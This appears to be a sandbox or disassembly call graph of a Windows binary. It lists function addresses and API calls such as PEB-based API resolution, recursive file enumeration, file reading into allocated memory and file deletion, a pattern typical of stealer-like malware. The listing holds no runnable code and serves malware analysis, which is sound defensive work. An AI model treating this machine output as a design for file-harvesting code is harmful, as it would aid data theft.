9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap HeapFree 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap HeapFree 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 CloseHandle 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap HeapFree 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 20 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 15 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 12 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 13 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 13 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 19 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 20 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 20 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 20 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 20 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 13 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 